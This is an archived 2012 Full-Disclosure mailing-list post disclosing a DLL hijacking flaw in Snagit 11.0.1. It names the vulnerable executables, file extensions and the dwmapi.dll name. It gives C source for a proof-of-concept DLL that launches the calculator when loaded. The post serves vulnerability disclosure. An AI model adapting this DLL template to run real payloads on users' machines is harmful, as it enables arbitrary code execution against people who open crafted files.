[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CADe7mMfJYLMaHN-5fgZf=2acrHYoa=F+ZxXtrXq5MUftcOieTQ@mail.gmail.com>
Date: Thu, 23 Aug 2012 04:22:04 -0700
From: kaveh ghaemmaghami <kavehghaemmaghami@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Snagit 11.0.1 (dwmapi.dll) DLL Hijacking Exploit
Exploit Title: Snagit 11.0.1 (dwmapi.dll) DLL Hijacking Exploit
Date: 2012-08-23
Author: coolkaveh
coolkaveh@...ketmail.com
Greets To Mohammad Morteza Sanaie
sanaie.morteza@...il.com
Https://twitter.com/coolkaveh
Vendor Homepage: http://www.techsmith.com/
Version: 11.0.1(build93)
Tested on: windows XP Sp3 ENG
---------------------------------------------------------
# Vulnerable: Pixel Bender snagit32.exe & snagiteditor.exe
---------------------------------------------------------
# Vulnerable extensions: .snagprof & .snag
---------------------------------------------------------
# Vulnerable Dll: dwmapi.dll
---------------------------------------------------------
#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void hook_startup() { exp(); }
int exp()
{
WinExec("calc", 0);
exit(0);
return 0;
}
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists